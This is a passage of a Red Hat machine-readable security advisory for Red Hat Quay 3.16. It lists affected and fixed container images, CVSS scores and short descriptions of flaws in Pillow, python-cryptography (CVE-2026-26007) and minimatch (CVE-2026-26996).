"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw, while difficult to exploit, would lead to a loss of integrity in the encrypted communication channel. Given that the cryptography package is a library, it is likely to be used in situations that do not require user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "RHBZ#2438762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
}
],
"release_date": "2026-02-10T21:42:56.471000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
},
{
"cve": "CVE-2026-26996",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-20T04:01:11.896063+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441268"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: minimatch: Denial of Service via specially crafted glob patterns",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
